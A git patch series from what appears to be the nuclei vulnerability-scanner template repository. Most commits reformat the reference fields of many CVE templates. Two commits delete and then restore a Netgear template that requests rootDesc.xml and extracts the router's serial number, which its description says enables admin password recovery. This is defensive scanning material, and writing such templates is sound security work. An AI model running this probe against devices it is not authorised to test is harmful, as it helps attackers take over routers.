b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -6,7 +6,7 @@ info: severity: high description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials tags: wordpress,plugin - references: | + reference: | - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ From 3b969e7e0d7bf90cc70defe7ef1a057561c40355 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:59:49 +0530 Subject: [PATCH 1717/4083] Delete netgear-router-disclosure.yaml --- .../other/netgear-router-disclosure.yaml | 41 ------------------- 1 file changed, 41 deletions(-) delete mode 100644 vulnerabilities/other/netgear-router-disclosure.yaml diff --git a/vulnerabilities/other/netgear-router-disclosure.yaml b/vulnerabilities/other/netgear-router-disclosure.yaml deleted file mode 100644 index e0e1dc8085..0000000000 --- a/vulnerabilities/other/netgear-router-disclosure.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: netgear-router-disclosure - -info: - name: Netgear Router S/N Disclosure - description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. - reference: - - https://www.exploit-db.com/exploits/47117 - - https://www.exploit-db.com/exploits/45741 - author: geeknik - severity: critical - tags: netgear,disclosure,iot - -requests: - - method: GET - path: - - "{{BaseURL}}/rootDesc.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - 501 - - - type: word - words: - - "" - - "" - - "" - condition: and - - - type: word - part: header - words: - - text/xml - - extractors: - - type: regex - group: 1 - regex: - - "([A-Z0-9]+)<\\/serialNumber>" From dd1bbe60931906189b93ff1e20a1f894cda1145a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 17:02:08 +0530 Subject: [PATCH 1718/4083] Revert "Delete netgear-router-disclosure.yaml" This reverts commit 3b969e7e0d7bf90cc70defe7ef1a057561c40355. --- .../other/netgear-router-disclosure.yaml | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 vulnerabilities/other/netgear-router-disclosure.yaml diff --git a/vulnerabilities/other/netgear-router-disclosure.yaml b/vulnerabilities/other/netgear-router-disclosure.yaml new file mode 100644 index 0000000000..e0e1dc8085 --- /dev/null +++ b/vulnerabilities/other/netgear-router-disclosure.yaml @@ -0,0 +1,41 @@ +id: netgear-router-disclosure + +info: + name: Netgear Router S/N Disclosure + description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. + reference: + - https://www.exploit-db.com/exploits/47117 + - https://www.exploit-db.com/exploits/45741 + author: geeknik + severity: critical + tags: netgear,disclosure,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/rootDesc.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - 501 + + - type: word + words: + - "" + - "" + - "" + condition: and + + - type: word + part: header + words: + - text/xml + + extractors: + - type: regex + group: 1 + regex: + - "([A-Z0-9]+)<\\/serialNumber>" From cdf945115842789beba149c7adca557100404405 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Wed, 18 Aug 2021 14:37:49 +0300 Subject: [PATCH 1719/4083] Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cnvd/CNVD-2021-30167.yaml | 2 +- cves/2005/CVE-2005-2428.yaml | 2 +- cves/2009/CVE-2009-0932.yaml | 2 +- cves/2009/CVE-2009-1872.yaml | 2 +- cves/2010/CVE-2010-2307.yaml | 2 +- cves/2010/CVE-2010-2861.yaml | 2 +- cves/2010/CVE-2010-4231.yaml | 2 +- cves/2011/CVE-2011-0049.yaml | 2 +- cves/2011/CVE-2011-1669.yaml | 2 +- cves/2012/CVE-2012-1823.yaml | 2 +- cves/2012/CVE-2012-4878.yaml | 2 +- cves/2012/CVE-2012-4889.yaml | 2 +- cves/2013/CVE-2013-3827.yaml | 2 +- cves/2013/CVE-2013-7240.yaml | 2 +- cves/2014/CVE-2014-3120.yaml | 2 +- cves/2014/CVE-2014-3704.yaml | 2 +- cves/2014/CVE-2014-3744.yaml | 2 +- cves/2014/CVE-2014-4210.yaml | 2 +- cves/2014/CVE-2014-6271.yaml | 2 +- cves/2015/CVE-2015-1000012.yaml | 2 +- cves/2015/CVE-2015-1427.yaml | 2 +- cves/2015/CVE-2015-1880.yaml | 2 +- cves/2015/CVE-2015-2080.yaml | 2 +- cves/2015/CVE-2015-3648.yaml | 2 +- cves/2015/CVE-2015-7823.yaml | 2 +- cves/2015/CVE-2015-9480.yaml | 2 +- cves/2016/CVE-2016-10960.yaml | 2 +- cves/2016/CVE-2016-2004.yaml | 52 ++++++++--------- cves/2016/CVE-2016-3081.yaml | 2 +- cves/2017/CVE-2017-1000486.yaml | 2 +- cves/2017/CVE-2017-12149.yaml | 2 +- cves/2017/CVE-2017-12542.yaml | 2 +- cves/2017/CVE-2017-12629.yaml | 2 +- cves/2017/CVE-2017-12637.yaml | 2 +- cves/2017/CVE-2017-12794.yaml | 2 +- cves/2017/CVE-2017-14535.yaml | 2 +- cves/2017/CVE-2017-14537.yaml | 2 +- cves/2017/CVE-2017-15647.yaml | 2 +- cves/2017/CVE-2017-15944.yaml | 2 +- cves/2017/CVE-2017-17059.yaml | 2 +- cves/2017/CVE-2017-17562.yaml | 2 +- cves/2017/CVE-2017-3506.yaml | 2 +- cves/2017/CVE-2017-3528.yaml | 2 +- cves/2017/CVE-2017-3881.yaml | 2 +- cves/2017/CVE-2017-5487.yaml | 2 +- cves/2017/CVE-2017-5521.yaml | 2 +- cves/2017/CVE-2017-7615.yaml | 3 +- cves/2017/CVE-2017-7921.yaml | 2 +- cves/2017/CVE-2017-9506.yaml | 2 +- cves/2017/CVE-2017-9791.yaml | 2 +- cves/2017/CVE-2017-9805.yaml | 2 +- cves/2017/CVE-2017-9841.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2018/CVE-2018-12031.yaml | 2 +- cves/2018/CVE-2018-16059.yaml | 2 +- cves/2018/CVE-2018-16283.yaml | 2 +- cves/2018/CVE-2018-17246.yaml | 2 +- cves/2018/CVE-2018-20985.yaml | 2 +- cves/2018/CVE-2018-3760.yaml | 2 +- cves/2018/CVE-2018-8715.yaml | 2 +- cves/2018/CVE-2018-8770.yaml | 2 +- cves/2019/CVE-2019-0221.yaml | 2 +- cves/2019/CVE-2019-10068.yaml | 2 +- cves/2019/CVE-2019-10092.yaml | 2 +- cves/2019/CVE-2019-11869.yaml | 2 +- cves/2019/CVE-2019-12314.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 2 +- cves/2019/CVE-2019-12725.yaml | 2 +- cves/2019/CVE-2019-13101.yaml | 2 +- cves/2019/CVE-2019-14223.yaml | 2 +- cves/2019/CVE-2019-14312.yaml | 2 +- cves/2019/CVE-2019-14470.yaml | 2 +- cves/2019/CVE-2019-15043.yaml | 2 +- cves/2019/CVE-2019-15713.yaml | 2 +- cves/2019/CVE-2019-1653.yaml | 2 +- cves/2019/CVE-2019-17270.yaml | 2 +- cves/2019/CVE-2019-20085.yaml | 2 +- cves/2019/CVE-2019-2616.yaml | 2 +- cves/2019/CVE-2019-2725.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-3799.yaml | 2 +- cves/2019/CVE-2019-5418.yaml | 2 +- cves/2019/CVE-2019-7219.yaml | 2 +- cves/2019/CVE-2019-7481.yaml | 2 +- cves/2019/CVE-2019-7609.yaml | 2 +- cves/2019/CVE-2019-8449.yaml | 2 +- cves/2019/CVE-2019-8451.yaml | 2 +- cves/2019/CVE-2019-8903.yaml | 2 +- cves/2019/CVE-2019-9041.yaml | 2 +- cves/2019/CVE-2019-9618.yaml | 2 +- cves/2019/CVE-2019-9733.yaml | 2 +- cves/2019/CVE-2019-9955.yaml | 2 +- cves/2020/CVE-2020-0618.yaml | 2 +- cves/2020/CVE-2020-10546.yaml | 2 +- cves/2020/CVE-2020-10548.yaml | 2 +- cves/2020/CVE-2020-10549.yaml | 2 +- cves/2020/CVE-2020-11034.yaml | 2 +- cves/2020/CVE-2020-11110.yaml | 2 +- cves/2020/CVE-2020-11455.yaml | 2 +- cves/2020/CVE-2020-11930.yaml | 2 +- cves/2020/CVE-2020-11978.yaml | 2 +- cves/2020/CVE-2020-13167.yaml | 2 +- cves/2020/CVE-2020-13937.yaml | 2 +- cves/2020/CVE-2020-13942.yaml | 2 +- cves/2020/CVE-2020-14181.yaml | 2 +- cves/2020/CVE-2020-14864.yaml | 2 +- cves/2020/CVE-2020-14882.yaml | 2 +- cves/2020/CVE-2020-15148.yaml | 2 +- cves/2020/CVE-2020-15227.yaml | 2 +- cves/2020/CVE-2020-16846.yaml | 2 +- cves/2020/CVE-2020-16952.yaml | 2 +- cves/2020/CVE-2020-17530.yaml | 2 +- cves/2020/CVE-2020-2096.yaml | 2 +- cves/2020/CVE-2020-25213.yaml | 2 +- cves/2020/CVE-2020-25506.yaml | 2 +- cves/2020/CVE-2020-26153.yaml | 2 +- cves/2020/CVE-2020-26214.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-27866.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-29227.yaml | 2 +- cves/2020/CVE-2020-29395.yaml | 2 +- cves/2020/CVE-2020-35736.yaml | 2 +- cves/2020/CVE-2020-3580.yaml | 2 +- cves/2020/CVE-2020-36112.yaml | 2 +- cves/2020/CVE-2020-36289.yaml | 2 +- cves/2020/CVE-2020-4463.yaml | 2 +- cves/2020/CVE-2020-5307.yaml | 2 +- cves/2020/CVE-2020-5902.yaml | 2 +- cves/2020/CVE-2020-7961.yaml | 2 +- cves/2020/CVE-2020-8115.yaml | 2 +- cves/2020/CVE-2020-8512.yaml | 2 +- cves/2020/CVE-2020-8515.yaml | 2 +- cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9036.yaml | 2 +- cves/2020/CVE-2020-9047.yaml | 2 +- cves/2020/CVE-2020-9054.yaml | 2 +- cves/2020/CVE-2020-9344.yaml | 2 +- cves/2020/CVE-2020-9402.yaml | 2 +- cves/2020/CVE-2020-9425.yaml | 2 +- cves/2020/CVE-2020-9490.yaml | 2 +- cves/2021/CVE-2021-1497.yaml | 2 +- cves/2021/CVE-2021-21307.yaml | 2 +- cves/2021/CVE-2021-21315.yaml | 2 +- cves/2021/CVE-2021-21389.yaml | 2 +- cves/2021/CVE-2021-21985.yaml | 2 +- cves/2021/CVE-2021-22122.yaml | 7 ++- cves/2021/CVE-2021-22214.yaml | 2 +- cves/2021/CVE-2021-23241.yaml | 2 +- cves/2021/CVE-2021-24176.yaml | 2 +- cves/2021/CVE-2021-24237.yaml | 2 +- cves/2021/CVE-2021-24285.yaml | 2 +- cves/2021/CVE-2021-24316.yaml | 2 +- cves/2021/CVE-2021-24340.yaml | 2 +- cves/2021/CVE-2021-24495.yaml | 2 +- cves/2021/CVE-2021-26295.yaml | 2 +- cves/2021/CVE-2021-26723.yaml | 2 +- cves/2021/CVE-2021-26812.yaml | 2 +- cves/2021/CVE-2021-26855.yaml | 2 +- cves/2021/CVE-2021-27651.yaml | 2 +- cves/2021/CVE-2021-27850.yaml | 2 +- cves/2021/CVE-2021-27905.yaml | 2 +- cves/2021/CVE-2021-28073.yaml | 2 +- cves/2021/CVE-2021-28149.yaml | 2 +- cves/2021/CVE-2021-28150.yaml | 2 +- cves/2021/CVE-2021-28151.yaml | 2 +- cves/2021/CVE-2021-28164.yaml | 2 +- cves/2021/CVE-2021-28169.yaml | 2 +- cves/2021/CVE-2021-29203.yaml | 2 +- cves/2021/CVE-2021-30151.yaml | 2 +- cves/2021/CVE-2021-3019.yaml | 2 +- cves/2021/CVE-2021-3129.yaml | 2 +- cves/2021/CVE-2021-31755.yaml | 2 +- cves/2021/CVE-2021-3223.yaml | 2 +- cves/2021/CVE-2021-32820.yaml | 2 +- cves/2021/CVE-2021-33544.yaml | 2 +- cves/2021/CVE-2021-3377.yaml | 2 +- cves/2021/CVE-2021-34429.yaml | 2 +- cves/2021/CVE-2021-35464.yaml | 2 +- .../showdoc/showdoc-default-password.yaml | 2 +- .../solarwinds/solarwinds-default-admin.yaml | 1 + dns/detect-dangling-cname.yaml | 2 +- exposures/apis/wadl-api.yaml | 2 +- exposures/configs/exposed-gitignore.yaml | 2 +- .../configs/exposed-sharepoint-list.yaml | 2 +- .../configs/git-config-nginxoffbyslash.yaml | 2 +- .../kyan-network-credentials-disclosure.yaml | 2 +- fuzzing/iis-shortname.yaml | 2 +- miscellaneous/tabnabbing-check.yaml | 2 +- miscellaneous/unpatched-coldfusion.yaml | 2 +- .../apache-filename-brute-force.yaml | 2 +- misconfiguration/exposed-service-now.yaml | 2 +- .../gitlab/gitlab-public-repos.yaml | 2 +- .../gitlab/gitlab-public-snippets.yaml | 2 +- misconfiguration/java-melody-exposed.yaml | 2 +- .../sap/sap-netweaver-info-leak.yaml | 2 +- network/deprecated-sshv1-detection.yaml | 2 +- network/openssh5.3-detect.yaml | 2 +- takeovers/ceros-takeover.yaml | 2 +- technologies/aem-detection.yaml | 2 +- technologies/detect-sentry.yaml | 2 +- technologies/favicon-detection.yaml | 2 +- .../sonicwall-email-security-detect.yaml | 2 +- .../telerik-dialoghandler-detect.yaml | 2 +- .../apache/apache-flink-unauth-rce.yaml | 2 +- .../apache/apache-solr-file-read.yaml | 2 +- .../confluence-ssrf-sharelinks.yaml | 2 +- vulnerabilities/generic/cache-poisoning.yaml | 2 +- .../jenkins/jenkins-asyncpeople.yaml | 44 +++++++-------- .../lsoft/listserv_maestro_rce.yaml | 2 +- .../oracle-ebs-bispgraph-file-access.yaml | 2 +- vulnerabilities/oracle/oracle-ebs-xss.yaml | 2 +- vulnerabilities/other/concrete-xss.yaml | 2 +- vulnerabilities/other/feifeicms-lfr.yaml | 2 +- vulnerabilities/other/huawei-hg659-lfi.yaml | 2 +- .../other/huawei-router-auth-bypass.yaml | 2 +- vulnerabilities/other/kevinlab-bems-sqli.yaml | 2 +- .../other/maian-cart-preauth-rce.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 3 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- .../other/netgear-wnap320-rce.yaml | 2 +- .../nginx-merge-slashes-path-traversal.yaml | 2 +- vulnerabilities/other/nuuo-nvrmini2-rce.yaml | 2 +- vulnerabilities/other/opensns-rce.yaml | 2 +- .../other/optilink-ont1gew-gpon-rce.yaml | 2 +- .../other/resin-cnnvd-200705-315.yaml | 2 +- vulnerabilities/other/resin-viewfile-lfr.yaml | 2 +- .../other/sonicwall-sslvpn-shellshock.yaml | 2 +- .../other/ueditor-file-upload.yaml | 2 +- .../other/visual-tools-dvr-rce.yaml | 2 +- vulnerabilities/other/wems-manager-xss.yaml | 2 +- vulnerabilities/other/yapi-rce.yaml | 2 +- .../springboot-actuators-jolokia-xxe.yaml | 2 +- .../springboot/springboot-h2-db-rce.yaml | 2 +- .../vmware/vmware-vcenter-lfi.yaml | 2 +- .../wordpress/w3c-total-cache-ssrf.yaml | 2 +- .../wordpress/wordpress-woocommerce-sqli.yaml | 2 +- .../wordpress/wordpress-wordfence-lfi.yaml | 2 +- .../wordpress-wpcourses-info-disclosure.yaml | 2 +- .../wp-123contactform-plugin-listing.yaml | 56 +++++++++---------- .../wp-memphis-documents-library-lfi.yaml | 2 +- .../wordpress/wp-socialfit-xss.yaml | 2 +- 244 files changed, 320 insertions(+), 320 deletions(-) diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml index 4302b87a88..7b7bc68cd0 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -4,7 +4,7 @@ info: name: UFIDA NC BeanShell Remote Code Execution author: pikpikcu severity: high - reference: | + reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 tags: beanshell,rce,cnvd diff --git a/cves/2005/CVE-2005-2428.yaml b/cves/2005/CVE-2005-2428.yaml index cb0b499e8c..061af2a832 100644 --- a/cves/2005/CVE-2005-2428.yaml +++ b/cves/2005/CVE-2005-2428.yaml @@ -5,7 +5,7 @@ info: severity: medium tags: cve,cve2005 description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. - reference: | + reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml index 5d4ccdc695..20514f9861 100644 --- a/cves/2009/CVE-2009-0932.yaml +++ b/cves/2009/CVE-2009-0932.yaml @@ -6,7 +6,7 @@ info: severity: high description: | Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. - reference: | + reference: - https://www.exploit-db.com/exploits/16154 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 tags: cve,cve2009,horde,lfi diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml index f2d3abffa1..23ecf0e325 100644 --- a/cves/2009/CVE-2009-1872.yaml +++ b/cves/2009/CVE-2009-1872.yaml @@ -5,7 +5,7 @@ info: author: princechaddha severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. - reference: | + reference: - https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 tags: cve,cve2009,adobe,xss,coldfusion diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index 18fea134a4..108671e209 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. - reference: | + reference: - https://www.securityfocus.com/bid/40550/info - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 tags: cve,cve2010,iot,lfi diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml index 1abefde474..7f29024985 100644 --- a/cves/2010/CVE-2010-2861.yaml +++ b/cves/2010/CVE-2010-2861.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - http://www.adobe.com/support/security/bulletins/apsb10-18.html tags: cve,cve2010,coldfusion,lfi diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index bd05d69769..282ff28783 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 tags: cve,cve2010,iot,lfi diff --git a/cves/2011/CVE-2011-0049.yaml b/cves/2011/CVE-2011-0049.yaml index 32717bd82c..f916e1470c 100644 --- a/cves/2011/CVE-2011-0049.yaml +++ b/cves/2011/CVE-2011-0049.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. - reference: | + reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 diff --git a/cves/2011/CVE-2011-1669.yaml b/cves/2011/CVE-2011-1669.yaml index c7f635c034..38bb238226 100644 --- a/cves/2011/CVE-2011-1669.yaml +++ b/cves/2011/CVE-2011-1669.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. - reference: | + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 tags: cve,cve2011,wordpress,wp-plugin,lfi diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index f2f74f08b9..c6730730c0 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -4,7 +4,7 @@ info: name: PHP CGI v5.3.12/5.4.2 RCE author: pikpikcu severity: critical - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 description: | diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml index 79bf5f60d2..8b3e35a428 100644 --- a/cves/2012/CVE-2012-4878.yaml +++ b/cves/2012/CVE-2012-4878.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. - reference: | + reference: - https://www.exploit-db.com/exploits/37034 - https://www.cvedetails.com/cve/CVE-2012-4878 tags: cve,cve2012,lfi diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml index d2ba389a72..c458850e5e 100644 --- a/cves/2012/CVE-2012-4889.yaml +++ b/cves/2012/CVE-2012-4889.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. - reference: | + reference: - https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 tags: cve,cve2012,xss,manageengine diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index d6883d7e82..033bea7806 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. tags: cve,cve2013,lfi,javafaces,oracle - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index cfa129b918..a91e2000b3 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 tags: cve,cve2013,wordpress,wp-plugin,lfi diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index fce21f4bbb..68a2b11bcd 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. - reference: | + reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released tags: cve,cve2014,elastic,rce diff --git a/cves/2014/CVE-2014-3704.yaml b/cves/2014/CVE-2014-3704.yaml index 8c3ccfac16..883f72ee3c 100644 --- a/cves/2014/CVE-2014-3704.yaml +++ b/cves/2014/CVE-2014-3704.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. - reference: | + reference: - https://www.drupal.org/SA-CORE-2014-005 - http://www.exploit-db.com/exploits/34984 - http://www.exploit-db.com/exploits/34992 diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index 87d35bcd02..d25a27bc60 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -4,7 +4,7 @@ info: name: Node.js st module Directory Traversal author: geeknik description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. - reference: | + reference: - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 severity: high diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index c959b3d88b..9a70384c82 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -5,7 +5,7 @@ info: author: princechaddha severity: medium tags: cve,cve2014,weblogic,oracle,ssrf - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index df10f8f96c..17d32d3a26 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -5,7 +5,7 @@ info: author: pentest_swissky severity: high description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications - reference: | + reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 2bb09f1aa2..b9a13af787 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -4,7 +4,7 @@ info: name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) author: daffainfo severity: high - reference: | + reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index bbaf08003e..40dd85cb6b 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script. - reference: | + reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ tags: cve,cve2015,elastic,rce diff --git a/cves/2015/CVE-2015-1880.yaml b/cves/2015/CVE-2015-1880.yaml index b16ce21184..9f2f2a251d 100644 --- a/cves/2015/CVE-2015-1880.yaml +++ b/cves/2015/CVE-2015-1880.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - 